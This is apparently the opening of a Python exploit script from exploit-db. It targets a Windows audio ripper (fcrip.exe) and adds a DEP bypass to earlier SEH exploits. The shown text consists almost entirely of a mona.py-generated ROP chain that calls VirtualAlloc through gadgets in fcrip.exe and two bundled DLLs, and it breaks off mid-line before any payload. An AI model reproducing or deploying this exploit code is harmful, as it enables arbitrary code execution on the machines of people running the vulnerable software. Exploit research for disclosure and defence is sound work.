#!/usr/bin/python # original p0c https://www.exploit-db.com/exploits/36465/ # credit to TUNISIAN CYBER # modified SEH Exploit https://www.exploit-db.com/exploits/36826/ # credit to ThreatActor at CoreRed.com # Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe # Tested on: Windows 7 Ultimate X64 # Added DEP Bypass to the exploit # naxxo (head@gmail.com) import struct def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x004103fe, # POP EAX # RETN [fcrip.exe] 0x004e91f4, # ptr to &VirtualAlloc() [IAT fcrip.exe] 0x00418ff8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe] 0x00446c97, # PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe] 0x41414141, # Filler (compensate) 0x6f4811f8, # POP EBP # RETN [vorbisfile.dll] 0x1000c5ce, # & push esp # ret [libFLAC.dll] 0x00415bfb, # POP EBX # RETN [fcrip.exe] 0x00000001, # 0x00000001-> ebx 0x00415828, # POP EDX # RETN [fcrip.exe] 0x00001000, # 0x00001000-> edx 0x10005f62, # POP ECX # RETN [libFLAC.dll] 0x00000040, # 0x00000040-> ecx 0x00409967, # POP EDI # RETN [fcrip.exe] 0x00412427, # RETN (ROP NOP) [fcrip.exe] 0x00494277, # POP EAX # RETN [fcrip.exe] 0x90909090, # nop 0x004c8dc0, # PUSHAD # RETN [fcrip.exe] ] return ''.join(struct.pack('